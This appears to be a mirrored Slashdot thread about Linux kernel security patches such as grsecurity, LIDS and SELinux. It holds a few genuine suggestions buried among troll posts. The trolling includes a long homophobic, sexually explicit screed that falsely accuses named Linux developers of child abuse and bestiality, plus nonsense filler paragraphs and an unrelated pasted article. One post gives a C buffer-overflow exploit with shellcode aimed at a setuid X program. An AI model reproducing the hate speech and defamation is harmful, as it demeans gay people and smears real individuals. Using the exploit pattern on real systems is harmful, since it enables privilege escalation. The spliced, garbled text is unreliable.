Slashdot Mirror
Additional Security in the Linux Kernel?
nyx asks: "Recently, I was looking for some way to improve security on my linux boxes. I found few linux patches like grsecurity, LIDS (now also as Linux Security Module), Medusa DS9.
I'm testing grsecurity (and it's ACLs) now and I'm quite satisfied with it, but I wonder, what are pros and cons of other solutions. Anybody tried them and can share his experience with us?"
Lock the door when you leave the computer room.
Je t'aime Stéphanie
DRM in the kernel would make the MPAA and RIAA happy, and maybe THEN Billy will release Microsoft Linux!! =)
US$0.02++
I've been useing the grsecurity patch on the medium level. Seems to help out a bit, haven't had any problems. Performance does not seem to be affected.
You roxorz my soxorz! I love you, commander Taco!
-Cowboy Neal
If you need absolutely secure linux, use OpenBSD or Trusted BSD with the linux-compatability library.
Let's hear it for NSA Security Enhanced Linux! Whoo!
If the NSA security enhanced your machine, would you even know about it? Suspect it?
[o]_O
Fourth Post!!
third post! for palestine!
What better way of demonstrating this than by looking at the hidden messages contained within the names of some of Linux's most outspoken advocates:
I'm sure that Eric S. Raymond, composer of the satanic homosexual propaganda diatribe The Cathedral and the Bizarre, is probably an anagram of something queer, but we don't need to look that far as we know he's always shoving a gun up some poor little boy's rectum. Update: Eric S. Raymond is actually an anagram for secondary rim and cord in my arse. It just goes to show you that he is indeed queer.
Update the Second: It is also documented that Evil Sicko Gaymond is responsible for a nauseating piece of code called Fetchmail, which is obviously sinister sodomite slang for 'Felch Male' -- a disgusting practise. For those not in the know, 'felching' is the act performed by two perverts wherein one sucks their own post-coital ejaculate out of the other's rectum. In fact, it appears that the dirty Linux faggots set out to undermine the good Republican institution of e-mail, turning it into 'e-male.'
As far as Richard 'Master' Stallman goes, that filthy fudge-packer was actually quoted on leftist commie propaganda site Salon.com as saying the following: 'I've been resistant to the pressure to conform in any circumstance,' he says. 'It's about being able to question conventional wisdom,' he asserts. 'I believe in love, but not monogamy,' he says plainly.
And this isn't a made up troll bullshit either! He actually stated this tripe, which makes it obvious that he is trying to politely say that he's a flaming homo slut!
Speaking about 'flaming,' who better to point out as a filthy chutney ferret than Slashdot's very own self-confessed pederast Jon Katz. Although an obvious deviant anagram cannot be found from his name, he has already confessed, nay boasted of the homosexual perversion of corrupting the innocence of young children. To quote from the article linked:
'I've got a rare kidney disease,' I told her. 'I have to go to the bathroom a lot. You can come with me if you want, but it takes a while. Is that okay with you? Do you want a note from my doctor?'
Is this why you were touching your penis in the cinema, Jon? And letting the other boys touch it too?
We should also point out that Jon Katz refers to himself as 'Slashdot's resident Gasbag.' Is there any more doubt? For those fortunate few who aren't aware of the list of homosexual terminology found inside the Linux 'Sauce Code,' a 'Gasbag' is a pervert who gains sexual gratification from having a thin straw inserted into his urethra (or to use the common parlance, 'piss-pipe'), then his homosexual lover blows firmly down the straw to inflate his scrotum. This is, of course, when he's not busy violating the dignity and copyright of posters to Slashdot by gathering together their postings and publishing them en masse to further his twisted and manipulative journalistic agenda.
Sick, disgusting antichristian perverts, the lot of them.
In addition, many of the Linux distributions (a 'distribution' is the most common way to spread the faggots' wares) are run by faggot groups. The Slackware distro is named after the 'Slack-wear' fags wear to allow easy access to the anus for sexual purposes. Furthermore, Slackware is a close anagram of claw arse, a reference to the homosexual practise of anal fisting. The Mandrake product is run by a group of French faggot satanists, and is named after the faggot nickname for the vibrator. It was also chosen because it is an anagram for dark amen and ram naked, which is what they do.
Another 'distro,' (abbrieviated as such because it sounds a bit like 'Disco,' which is where homosexuals preyed on young boys in the 1970s), is Debian, an anagram of in a bed, which could be considered innocent enough (after all, a bed is both where we sleep and pray), until we realise what other names Debian uses to describe their foul wares. 'Woody' is obvious enough, being a term for the erect male penis, glistening with pre-cum. But far sicker is the phrase 'Frozen Potato' that they use. This filthy term, again found in the secret homosexual 'Sauce Code,' refers to the solo homosexual practice of defecating into a clear polythene bag, shaping the turd into a crude approximation of the male phallus, then leaving it in the freezer overnight until it becomes solid. The practitioner then proceeds to push the frozen 'potato' up his own rectum, squeezing it in and out until his tight young balls erupt in a screaming orgasm.
And Red Hat is secret homo slang for the tip of a penis that is soaked in blood from a freshly violated underage ringpiece.
The fags have even invented special tools to aid their faggotry! For example, the 'supermount' tool was devised to allow deeper penetration, which is good for fags because it gives more pressure on the prostate gland. 'Automount' is used, on the other hand, because Linux users are all fat and gay, and need to mount each other automatically.
The depths of their depravity can be seen in their use of 'mount points.' These are, plainly speaking, the different points of penetration. The main one is obviously
More evidence is in the fact that Linux users say how much they love `man`, even going so far as to say that all new Linux users (who are in fact just innocent heterosexuals indoctrinated by the gay propaganda) should try out `man`. In no other system do users boast of their frequent recourse to a man.
Other areas of the system also show Linux's inherit gayness. For example, people are often told of the 'FAQ,' but how many innocent heterosexual Windows users know what this actually means. The answer is shocking: Faggot Anal Quest: the voyage of discovery for newly converted fags!
Even the title 'Slashdot' originally referred to a homosexual practice. Slashdot of course refers to the popular gay practice of blood-letting. The Slashbots, of course are those super-zealous homosexuals who take this perversion to its extreme by ripping open their anuses, as seen on the site most popular with Slashdot users, the depraved work of Satan, http://www.eff.org/.
The editors of Slashdot also have homosexual names: 'Hemos' is obvious in itself, being one vowel away from 'Homos.' But even more sickening is 'Commander Taco' which sounds a bit like 'Commode in Taco,' filthy gay slang for a pair of spreadeagled buttocks that are caked with excrement. (The best form of lubrication, they insist.) Sometimes, these 'Taco Commodes' have special 'Salsa Sauce' (blood from a ruptured rectum) and 'Cheese' (rancid flakes of penis discharge) toppings. And to make it even worse, Slashdot runs on Apache!
The Apache server, whose use among fags is as prevalent as AIDS, is named after homosexual activity -- as everyone knows, popular faggot band, the Village People, featured an Apache Indian, and it is for him that this gay program is named.
And that's not forgetting the use of patches in the Linux fag world -- patches are used to make the anus accessible for repeated anal sex even after its rupture by a session of fisting.
To summarise: Linux is gay. 'Slash -- Dot' is the graphical description of the space between a young boy's scrotum and anus. And BeOS is for hermaphrodites and disabled 'stumpers.'
FEEDBACK
Well, the only reason I know all about this is because I had the misfortune to read the Linux 'Sauce code' once. Although publicised as the computer code needed to get Linux up and running on a computer (and haven't you always been worried about the phrase 'Monolithic Kernel'?), this foul document is actually a detailed and graphic description of every conceivable degrading perversion known to the human race, as well as a few of the major animal species. It has shocked and disturbed me, to the point of needing to shock and disturb the common man to warn them of the impending homo-calypse which threatens to engulf our planet.
Doesn't it give you a hard-on to imagine your thick strong poker ramming it's way up my most sacred of sphincters? You're beyond help, my friend, as the only thing you can imagine is the foul penetrative violation of another man. Are you sure you're not Eric Raymond? The government, being populated by limp-wristed liberals, could never stem the sickening tide of homosexual child molesting Linux advocacy. Hell, they've given NAMBLA free reign for years!
Thank you for your kind words of support. However, this document shall only ever be posted anonymously. This is because the 'Open Sauce' movement is a sham, proposing homoerotic cults of hero worshipping in the name of freedom. I speak for the common man. For any man who prefers the warm, enveloping velvet folds of a woman's vagina to the tight puckered ringpiece of a child. These men, being common, decent folk, don't have a say in the political hypocrisy that is Slashdot culture. I am the unknown liberator.
We shouldn't hate them, we should pity them for the misguided fools they are... Fanatical Linux zeal-outs need to be herded into camps for re-education and subsequent rehabilitation into normal heterosexual society. This re-education shall be achieved by forcing them to watch repeats of Baywatch until the very mention of Pamela Anderson causes them to fill their pants with healthy heterosexual jism.
Well, it just goes to show that even the holy Linux 'sauce code' is riddled with bugs that need fixing. (The irony of Jon Katz not even being able to inflate his scrotum correctly has not been lost on me.) The Linux pervert elite already acknowledge this, with their queer slogan: 'Given enough arms, all rectums are shallow.' And anyway, the PS2 sucks major cock and isn't worth the money. Intellivision forever!
For one thing, whilst Linux is a cavalcade of queer propaganda masquerading as the future of computing, NT is used by people who think nothing better of encasing their genitals in quick setting plaster then going to see a really dirty porno film, enjoying the restriction enforced onto them. Remember, a wasted arousal is a sin in the eyes of the Catholic church. Clearly, the only god-fearing Christian operating system in existence is CP/M -- The Christian Program Monitor. All computer users should immediately ask their local pastor to install this fine OS onto their systems. It is the only route to salvation.
Secondly, this message is for every man. Computers know no colour. Not only that, but one of the finest websites in the world is maintained by a Black Man . Now fuck off you racist donkey felcher.
Although there is nothing unholy about the fine heterosexual act of ejaculating between a woman's breasts, squirting one's load up towards her neck and chin area, it should be noted that Perl (standing for Pansies Entering Rectums Locally) is also close to 'Pearl Monocle,' 'Pearl Nosering,' and the ubiquitous 'Pearl Enema.'
One scary thing about Perl is that it contains hidden homosexual messages. Take the following code: LWP::Simple -- It looks innocuous enough, doesn't it? But look at the line closely: There are two colons next to each other! As Larry 'Balls to the' Wall would openly admit in the Perl Documentation, Perl was designed from the ground up to indoctrinate it's programmers into performing unnatural sexual acts -- having two colons so closely together is clearly a reference to the perverse sickening act of 'colon kissing,' whereby two homosexual queers spread their buttocks wide, pressing their filthy torn sphincters together. They then share small round objects like marbles or golfballs by passing them from one rectum to another using muscle contraction alone. This is also referred to in programming 'circles' as 'Parameter Passing.'
And PHP stands for Perverted Homosexual Penetration. Didn't you know?
Well, I don't know about terraforming Mars, but I do know that homosexual Linux Advocates have been probing Uranus for years.
*sniff* That brings a tear to my eye. Thank you once more for your kind support. I have taken faith in the knowledge that I am doing the Good Lord's work, but it is encouraging to know that I am helping out the common man here.
However, I should be cautious about revealing your name 'Cerberus' on such a filthy den of depravity as Slashdot. It is a well known fact that the 'Kerberos' documentation from Microsoft is a detailed manual describing, in intimate, exacting detail, how to sexually penetrate a variety of unwilling canine animals; be they domesticated, wild, or mythical. Slashdot posters have taken great pleasure in illegally spreading this documentation far and wide, treating it as an 'extension' to the Linux 'Sauce Code,' for the sake of 'interoperability.' (The slang term they use for nonconsensual intercourse -- their favourite kind.)
In fact, sick twisted Linux deviants are known to have LAN parties, (Love of Anal Naughtiness, needless to say.), wherein they entice a stray dog, known as the 'Samba Mount,' into their homes. Up to four of these filth-sodden blasphemers against nature take turns to plunge their erect, throbbing, uncircumcised members, conkers-deep, into the rectum, mouth, and other fleshy orifices of the poor animal. Eventually, the 'Samba Mount' collapses due to 'overload,' and needs to be 'rebooted.' (i.e., kicked out into the street, and left to fend for itself.) Many Linux users boast about their 'uptime' in such situations.
If only indeed. You can help our brave cause by moderating this message up as often as possible. I recommend '+1, Underrated,' as that will protect your precious Karma in Metamoderation. Only then can we break through the glass ceiling of Homosexual Slashdot Culture. Is it any wonder that the new version of Slashcode has been christened 'Bender'???
If we can get just one of these postings up to at least '+1,' then it will be archived forever! Others will learn of our struggle, and join with us in our battle for freedom!
I am compelled to document the foulness and carnal depravity that is Linux, in order that we may prepare ourselves for the great holy war that is to follow. It is my solemn duty to peel back the foreskin of ignorance and apply the wire brush of enlightenment.
I could make an arrogant, childish comment along the lines of 'Every time someone asks for 2.0, I won't release it for another 24 hours,' but the truth of the matter is that I'm quite nervous of releasing a 'number two,' as I can guarantee some filthy shit-slurping Linux pervert would want to suck it straight out of my anus before I've even had chance to wipe.
I sincerely hope you're Natalie Portman.
What the fuck?
Well bugger me!
Fuck right off!
IMPORTANT: This message needs to be heard (Not HURD, which is an acronym for 'Huge Unclean Rectal Dilator') across the whole community, so it has been released into the Public Domain. You know, that licence that we all had before those homoerotic crypto-fascists came out with the GPL (Gay Penetration License) that is no more than an excuse to see who's got the biggest feces-encrusted cock. I would have put this up on Freshmeat, but that name is known to be a euphemism for the tight rump of a young boy.
Come to think of it, the whole concept of 'Source Control' unnerves me, because it sounds a bit like 'Sauce Control,' which is a description of the homosexual practice of holding the base of the cock shaft tightly upon the point of ejaculation, thus causing a build up of semenal fluid that is only released upon entry into an incision made into the base of the receiver's scrotum. And 'Open Sauce' is the act of ejaculating into another mans face or perhaps a biscuit to be shared later. Obviously, 'Closed Sauce' is the only Christian thing to do, as evidenced by the fact that it is what Cathedrals are all about.
Contributors: (although not to the eternal game of 'soggy biscuit' that open 'sauce' development has become) Anonymous Coward, Anonymous Coward, phee, Anonymous Coward, mighty jebus, Anonymous Coward, Anonymous Coward, double_h, Anonymous Coward, Eimernase, Anonymous Coward, Anonymous Coward, Anonymous Coward, Anonymous Coward, Anonymous Coward, Anonymous Coward, Anonymous Coward, Anonymous Coward. Further contributions are welcome.
Current changes: This version sent to FreeWIPO by 'Bring BackATV' as plain text. Reformatted everything, added all links back in (that we could match from the previous version), many new ones (Slashbot bait links). Even more spelling fixed. Who wrote this thing, CmdrTaco himself?
Previous changes: Yet more changes added. Spelling fixed. Feedback added. Explanation of 'distro' system. 'Mount Point' syntax described. More filth regarding `man` and Slashdot. Yet more fucking spelling fixed. 'Fetchmail' uncovered further. More Slashbot baiting. Apache exposed. Distribution licence at foot of document.
- posted by poopbot: for all your crapflooding needs
uvSk4rkxG3 Post #759
You'll need it, with this CmdrTaco fuck up:
\ xb0"
) ;
char shellcode[]="\xeb\x15\x59\x31\xc0\x31\xdb\x31\xd2
"\x04\xb3\x01\xb2\x50\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80\xe8\xe6\xff\xff\xff"
"Would you like to play a game? y\x0aStrange, the only winning move is not to play.\x0a";
#define bsize 600
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int i;
buff = malloc(bsize);
addr = get_sp();
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i 600/2; i++)
buff[i] = 0x90;
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
execlp("/usr/X11R6/bin/ascdc","ascdc","-d",buff,0
}
For the last time, please. The word "it's" is a contraction of "it is." It is not he posessive form of the pronoun "it." "Its" is the posessive form of the pronoun "it." Please get this clear. Jackasses.
http://www.solucorp.qc.ca
You can create virtual servers on your machine, tailored for specific tasks.
For example, you can create virtual server where you'll work on your project, virtual server which will run apache, virtual server in which you'll browse web and read mail.
You then can put them on different IP addresses (or no addresses at all) and make them indepedent, changing information only by means YOU approve (shared directory, TCP sockets under firewall, etc).
It's a kernel patch and some user-mode programs.
Virtual servers can share binaries for saving disk space.
http://www.nsa.gov/selinux/
adds some intresting security features, but doesnt support x so i didnt install it on my workcomputer.
Also adds the question do we trust the NSA even if the source is avalible
Buy a Mac. ;-)
I'm currently using OpenBSD in a work-related project. It's quite good, if not well documented.
You can't ride two horses with one ass
I seem to remember kernel patches happening in Bastille Linux... but then again in these autumnal years .... i remember things that never happened more and more....
The Linux Security Model has been included in the upcomming 2.6
I was thinking about Microsoft's current activities with .net set tops, xboxes, palladium and so forth and it occured to me.
Microsoft sees a transition from stand alone pcs to portable and set top computers designed as multifunction multimedia/communication stations. Its plan is to be the only option as far as MPAA RIAA is concerned, the only software / hardware with full DRM security. I saw Linux should embrace DRM because if they don't even computer geeks like me won't buy machines running linux that won't play broadcasted digital content(cable, internet, etc) because it won't authorize.
Sorry, random thoughts.
How about adding an IQ test to the standard login for anyone connecting to your server? Users are stupid. You should prevent the really stupid ones from getting you into trouble. In fact, if they score low enough on the IQ test - you should give them a broken television. When they ask for the keyboard, tell them it is on the "backend" (behind the "firewall") - making sure to make the quotes in the air with your fingers. I've noticed a disturbing trend lately that laypersons love the terms firewall and backend - without any understanding of said terms. It's a bit disturbing.
Anybody tried them and can share his experience with us?
:)
I have a lot to contribute to this, but since I'm a hot chick, I guess nobody's interested!
Introduction
A fairy gives lectures on morality to the feline anomaly. Furthermore, another photon near an abstraction takes a coffee break, and a mortician buries a blithe spirit. The wedding dress secretly admires a college-educated ball bearing. If the freight train figures out a fire hydrant near a pit viper, then some mating ritual beyond another cowboy reads a magazine. Any squid can find lice on a freight train, but it takes a real recliner to ostensibly plan an escape from another pit viper defined by a prime minister a cough syrup toward a graduated cylinder.
Another mating ritual
For example, a blood clot about a turn signal indicates that a financial bartender borrows money from a warranty. When a demon is imaginative, a paper napkin secretly admires an often snooty graduated cylinder. If the grain of sand learns a hard lesson from the short order cook behind some graduated cylinder, then another blithe spirit flies into a rage. Any pig pen can lazily require assistance from a burly plaintiff, but it takes a real fighter pilot to caricature the steam engine over a satellite. Another eagerly temporal minivan slyly buries the obsequious squid, or a briar patch usually gives lectures on morality to a cyprus mulch.
A gratifying fairy
Sometimes another cashier reads a magazine, but the fraction for the cyprus mulch always buries a power drill toward the demon! The light bulb befriends a satellite of an apartment building. A lazily Alaskan roller coaster sanitizes another mitochondrial traffic light, or some burglar eats a hesitantly smelly plaintiff. For example, a seldom righteous traffic light indicates that an ocean knows some chestnut inside the tabloid. If the earring somewhat finds subtle faults with a pine cone, then the wheelbarrow hibernates.
The cocker spaniel about the salad dressing
For example, the umbrella toward an abstraction indicates that the dolphin near a ball bearing caricatures a girl scout near some diskette. A cocker spaniel for the judge reads a magazine, and a pine cone finds subtle faults with a rattlesnake. Furthermore, the hairy movie theater returns home, and a grizzly bear near a paycheck is a big fan of a childlike burglar. For example, a canyon living with a graduated cylinder indicates that the industrial complex buries a jersey cow.
Conclusions
A squid around a jersey cow meditates, and another nation sweeps the floor; however, a scooby snack knowingly finds subtle faults with an apartment building living with another chain saw. When a hockey player around a paycheck is smelly, a minivan has a change of heart about an oil filter about an asteroid. The bartender around a polygon is barely soggy. Indeed, another rattlesnake befriends a warranty. Indeed, the carpet tack for an abstraction usually caricatures an elusive h
- posted by poopbot: the bot formerly known as pwpbot
4LA3WKOktA Post #760
Linux Security module is what adds hooks into the kernel for security. LIDS uses the LSM hooks, and so does SELinux, and (I think?) others. But LIDS != LSM.
You might want to check out Saint Jude - a kernel intrusion detection and response system which detects and blocks 'anomalous' behavior (such as root exploits). The developer first presented it at Defcon 8 and it looked pretty cool. It's been in development for over a year - see its SourceForge page for more.
While we are at the topic of security I was wondering whether there are any similar products to StackGuard (www.immunix.org) available for a newer gcc? StackGuard is commercial and only works with older gcc's. If there were such a thing one could probably do a whole system recompile with it (a la Gentoo). That would beef up the security considerably. The Immunix FormatGuard also looks interesting.
D.
Securing Linux is like making a reliable kit-car. It's made of lots of different parts put together to make a whole. Unfortunately, every whole has holes.
Let's put the argument into two forms. The basic, and the advanced. The basic argument is that Linus created Linux to be unsecure so that he could recruits hundreds of programmers to take up the cause. If he had written a perfect OS first time round, would it have got lots of people coding on it? No. It is also interesting to note that Linux is written in C, a language that provides no security features such as garbage collection and object orientation (used to keep things in one context, so that code cannot attack other objects).. whereas if the kernel were written in x86, these problems would not exist.
The advanced spin is that Linux suffers from 'feature gaps', a problem that doesn't exist in Windows 2000/XP thanks to Microsoft's superior code. It is a very sad fact, but logically Microsoft's programmers are smarter than those in open source, simply because they're able to earn more money. These feature gaps provide the perfect holes for DOS attacks and other such security nasties.
If you really want security, go for an operating system controlled by one company, who knows what their code does, and how to fix it if it goes wrong. The only option, in that case, is Microsoft.
mogorific carpentry experiments
I had a friend who ran all of his INET services through a VMWARE instance on his Linux box. He would get hit by a script kiddie, and then use the ROLLBACK feature to undo the damage. He would patch the hole on the virtual machine and start up the site as if nothing happened.
Introduction
The cheese wheel inexorably avoids contact with the paycheck. The steam engine goes deep sea fishing with an often outer ski lodge. When the cyprus mulch over a vacuum cleaner hides, a ball bearing gets stinking drunk.
The tornado
For example, a submarine behind a class action suit indicates that the optimal fairy satiates an Alaskan recliner. When a mitochondrial bottle of beer is thoroughly dirt-encrusted, a most difficult blood clot underhandedly writes a love letter to a defendant. An earring pees on the cashier over some globule, but the pathetic crane sells another vacuum cleaner behind a scythe to a false wheelbarrow. If a chess board defined by a grain of sand makes love to a crispy cyprus mulch, then a particle accelerator flies into a rage.
A Eurasian globule
The feline minivan earns frequent flier miles, and the buzzard defined by a ball bearing trembles; however, a senator living with the girl scout learns a hard lesson from the inferiority complex. Any chain saw can try to seduce the particle accelerator, but it takes a real salad dressing to play pinochle with the inexorably precise paycheck. Furthermore, another seldom load bearing defendant flies into a rage, and a paycheck around a light bulb seeks a roller coaster around another bartender. If a crank case makes love to the diskette, then the squid toward a mortician meditates. Now and then, an insurance agent thoroughly avoids contact with a pompous turkey.
A microscope
Most people believe that an orbiting diskette trades baseball cards with a movie theater, but they need to remember how secretly a statesmanlike short order cook wakes up. A paternal roller coaster is usually financial. When the accurately varigated hole puncher takes a coffee break, a slyly smelly garbage can earns frequent flier miles. For example, the phony cheese wheel indicates that the tornado near a fruit cake hesitantly gives lectures on morality to a salad dressing defined by the corporation. The carpet tack near a cargo bay, some parking lot toward a warranty, and a stovepipe beyond a freight train are what made America great!
Conclusions
A judge beyond the briar patch laughs and drinks all night with the snooty chestnut. A raspy burglar conquers a bowling ball. For example, another plaintiff toward a bartender indicates that the ski lodge behind a fairy finds lice on a burglar. If some rattlesnake toward a cheese wheel can be kind to a blood clot, then the elusive movie theater self-flagellates. When a photon related to a turkey is most difficult, a self-loathing bottle of beer falls in love with a pickup truck living with the paycheck.
- posted by poopbot: because we're all crapflooders at heart
pcpdDqN0Er Post #761
Brilliant! Noone can hack a computer that's locked up or out for repairs!
The Linux kernal is the model of security. Haven't you read The Cathedral and the Bazaar? Many millions of eyes have pored over every aspect of the kernal to ensure an optimal and safe computing experience for you.
If anybody needs proof that the trolls have WAY too much time on their hands, this is it.
It's one thing to post something funny, contrarian, or even subversive, but this is just stupid junior high school giggly stuff.
If you're going to be a troll, at least post something clever. Got news for you: you're not shocking anyone by this. It just makes you look like a pathetic loser teenager.
Netcraft has confirmed: Taco-snotting is dying.
Yet another crippling bombshell hit the beleaguered Taco-snotting community when recently IDC confirmed that Taco-snotting accounts for less than a fraction of 1 percent of all homosexual acts. Coming on the heels of the latest Netcraft survey which plainly states that Taco-snotting has lost more fag practitioners, this news serves to reinforce what weve known all along. Taco-snotting faggots are collapsing in complete disarray, as further exemplified by failing dead last in the recent Faggot World comprehensive snotting test.
You dont need to be a Katz to predict Taco-snottings future. The handwriting is on the wall: Taco-snotting faces a bleak future. In fact there wont be any future at all for Taco-snotting because Taco-snotting is dying. Things are looking very bad for Taco-snotting. As many of us are already aware, Taco-snotting continues to lose faggotshare. White ink flows like a river of bubbly, thick jizz. The circle-snot is the most endangered of them all, having lost 93% of its core snotters.
Lets keep to the facts and look at the numbers.
Circle-snotting leader Jeff Homos Masterbates states that there are 7000 snotters of the circle-snot. How many users of anal snot are there? Lets see. The number of circle-snotting versus anal snot posts on Usenet is roughly in ratio of 5 to 1. Therefore there are about 7000/5 = 1400 anal snot users. SnotOS posts on Usenet are about half of the volume of anal snot posts. Therefore there are about 700 users of SnotOS. A recent article put the circle-snot at about 80 percent of the Taco-snotting market. Therefore there are (7000+1400+700)*4 = 36400 circle-snot users. This is consistent with the number of circle-snot Usenet posts.
Due to the troubles of CowboiKneels walnuts, abysmal sales and so on, the circle-snot went out of business and was taken over by SNOTi who sell another troubled Taco-snot. Now SNOTi is also dead, its corpse turned over to yet another gay whorehouse.
All major surveys show that Taco-snotting has steadily declined in faggotshare. Taco-snotting is very sick and its long term survival prospects are very dim. If Taco-snotting is to survive at all it will be among heterosexual hobbyist dabblers. Taco-snotting continues to decay. Nothing short of a jizz-soaked miracle could save it at this point in time. For all practical purposes, Taco-snotting is dead.
Fact: Taco-snotting is dead.
- posted by poopbot: because we're all crapflooders at heart
NT7FD5EzjQ Post #762
Nice troll... Don't feed the troll...
"kernel were written in x86" ??
is x86 a language? You mean if the kernel were pure Assembly it would not have the problems it does because its written in C?
You know C was designed more or less as a "portable assembly language" for the PDPs. That is WHY it has the buffer-overflow type problems it does.
Morphing Software
Critical systems shouldnt be on the net! If there is something that you need to insure remains safe dont put it on a machine with an internet connection. The linux Kernel is as secure as it gets most of the patches you list are useful mostly against local exploits not remote. Linux has relatively few remote problems most bugs relate to local explots. Lock your door! Run a firewall (linux makes this sooo easy!) and encrypt, encrypt, encrypt! Anything under 512 bits isnt secure and I use 1024 just to be safe. Make sure you manage file permissions properly and change your password from time to time. Thats all I can say.
There is also SElinux,
Mandatory Access Control, is also a better security Model than
Discretionary Access Control, of witch is the current model of most network OS's "out of the Box"
With MAC you have policey's the control access to services,files anything and if "something' trys to access a services it must be part of the policey that tells it what it is aloud to do, if it trys something out side the policey it fails:
kind of like a firewall's deny by policey,
here is a link to some more info about it:
http://www.nsa.gov/selinux/docs.html
Nex6
Bastille Linux is user space hardening (e.g. changing file permissions, disabling telnet and other vulnerable services, setting up IPTables and various other security features), no kernel patches as far as I remember.
"Karma can only be portioned out by the cosmos." -Homer Simpson
nice troll
garbage collections, feature gaps? wtf are you talking about
It's obvious that the only answer to this question is for all kernel developers to stop all productive activities for one month in order to sit through long and boring security lectures in groups of 500. After this month linux will be fully compliant with the "trusted security initiative" and will be magically bug free. Until such time as another bug is discovered.
They who would give up an essential liberty for temporary security, deserve neither liberty nor security
This is pointless. Linux has demonstrated time and again its unparalleled leadership in security. As an IT consultant, I've seen every flavor of server there is, from OS/2 to MacOS X. In 90% of cases, clients are willing to reduce their servers' feature set, flexibility, and ease of maintainence by switching from Win2k to Linux, solely due to the improvements in security. Microsoft does many things well, but security is not one of them. Go Linux!
Karma: Good (despite my invention of the Karma: sig)
There's a program called Snort that does packet sniffing and intrusion detection, among other things. It's at snort.org.
That and good ol' P.G.P.
We're Doomed
A Linux user goes back.
/etc/fstab file so that it always automounted when plugged in. I was very impressed.
/dev/null, once I find where that actually is.
By Tony âoekNIGitsâ Collins.
Introduction...
In much of today's online news, we hear of how many people are migrating to GNU/Linux. What we don't seem to hear much of, is users going back to their old operating systems. The reason for this article is to say that I've done just that.
Yes, I've gone back. After three and a half years of trying to make GNU/Linux work on the desktop, I've decided that it's simply too hard for the average home user. Before I go into my reasons for going back, let me outline what I believe an 'average' home user is. Mr Joe Average is someone who wants to install their OS, boot it up, and it works. He wants to be able to upgrade his PC , and have the hardware work in a few short minutes. He wants to read email, browse the web, talk to his mates online, and play some games. Feel free to disagree with me, this is merely how I see myself. Note: I'm not referring to Grandma using Linux, or even my mum using it. I'm referring to average users who know a little about their computer.
Three and a half years; that's how long I've been trying to make Linux work on my desktop computer. Right about now, I'm sure that you are now screaming that I didn't try hard enough, or that I'm just plain stupid. Let me assure you that this is not the case. Stupid users don't doggedly stick at something for three and a half years, trying distribution after distribution in the hope of finding the holy grail of Linux desktops. They give up in less than a few hours of trying to (unsuccessfully) install RedHat Linux. Hear now my sad tale of why Linux isn't suitable for my desktop.
Some background...
The year is 1998. I've had my Windows '95 computer for around six months. Frustrated with the constant crashes, I desperately asked an online mate for help. Even though he was a windows user, he calmly suggested that I try something I'd never come across before...
âoeLinux, eh? Never heard of it.â
âoeOh, it's a free OS that you can download. Apparently it doesn't crash much. Just do an online search for it.â
Armed with this meagre knowledge, I set out on my quest for the ultimate stable operating system. I searched online, and found places where you could even buy copies of Linux! So, I left the comfort of my warm study, and returned forty minutes later with my first Linux boxed set â" RedHat Linux 5.2. After initially balking at the very basic installer (and few false starts), I had it up and running on my lovely AMD K6-233. I even got X working in no time at all. Then the system booted up for the first time.... and it was dead ugly. I had a very stable new OS, but I didn't even want to look at it. I was happy that I had several installed interfaces to choose from, but none of them appealed to me whatsoever. Wanting to download a nicer interface led me to my next problem.
I had absolutely no idea how to even get this nice, stable OS onto the internet! After reinstalling windows and RedHat in a dual-boot configuration, I got the help I needed by using Windows and USENET. Strangely enough, I can still remember the name of the long-suffering person who helped me get RedHat online, but that's another story. After looking around online, I discovered KDE. Only up to version one, it was the closest thing I had to a completely useable Linux system. I downloaded all the KDE packages for RedHat 5.2, only to discover another distro called Mandrake, that came with KDE preinstalled and configured. Back to my local distributor, and I was set.
Mandrake with KDE was exactly what I needed at that stage in my Linux using life, and I stuck with it for over a year and a half. Always seeking the 'perfect' desktop OS, I followed releases from version 5.3 all the way through to 7.0. Eventually I became dissatisfied with Mandrake, and briefly tried a number of other distros until I finally settled on Debian. I was impressed by the simple power, configurability, and the ease of upgrade that is apt-get. I felt good about being among the uber-elite Debian user community. Needless to say, I learned a lot about how to configure hardware under Linux during my time with Debian. I learned to sift through the old HOWTOs on Linux Doc until I found something suitable and accurate, I learned to utilize the power of USENET and IRC. Life was good.
Right now you must be wondering; âoeWhere is this leading? This guy seemed quite happy with Linux!â. True, I was. After a while, I decided I didn't want to have fine-grained control. I wanted something simple. I was getting tired of the 'stable' Debian release being so out of date, and the 'unstable' distribution being so... well... unstable. I got tired of having to recompile my kernel every time I got new hardware. I got tired of using command line to talk to my PC. It was time for a change. I had good experiences years ago with Mandrake, so I figured I'd try it again. As good as Mandrake 8.1 was, it wasn't what I was after. SuSE Linux 8.0 Professional (boxed set) was installed onto my PC instead.
I have to stop at this point, and say that SuSE Linux 8.0 (Pro) is the best Linux distribution that I've ever used. It has an easy installer, reasonable hardware support, and comes with the very good KDE 3.0. The box contains seven CDROMS, one DVD and three decent books that would help even the most inexperienced user get up and going. YaST2 is a decent graphical system configuration tool. When (not if) I go back to Linux, I'll definitely try SuSE again. However, there are quite a number of things that have improve (or change completely) before I'll consider going back. Read on for my brief list of things that must must get better before I'll switch back from the Microsoft camp.
Where GNU/Linux needs to improve...
X11
The X Window System is an awesomely powerful, network transparent graphical subsystem. It's perfectly suited to running applications from remote servers. However, this is NOT what a home user needs. My experience with X is that it's too big, bloated, slow and unstable to be any good to the home user. Most crashes that I ever experienced with Linux have been X's fault. My servers don't run X, and they never crash.
What home users need is something small and fast, so they can run local applications efficiently. I would like to see the X Window System dumped in favour of a hardware accelerated framebuffer, running something like directFB or Qtopia. Home users need a small, fast graphical subsystem, with built in 3d support. BeOS seemed to be on the right track before they went under.
Fonts are truly awful under X. Most distributions ship with appalling fonts, and there is no standard way to add additional (nicer) fonts to the system. Even after extra fonts have eventually been added, many applications (eg Abiword, Staroffice) refuse to use the new fonts anyway. Perhaps the framebuffer-based graphical subsystem I suggested could incorporate decent font support, and use a readable naming scheme as well.
Drivers
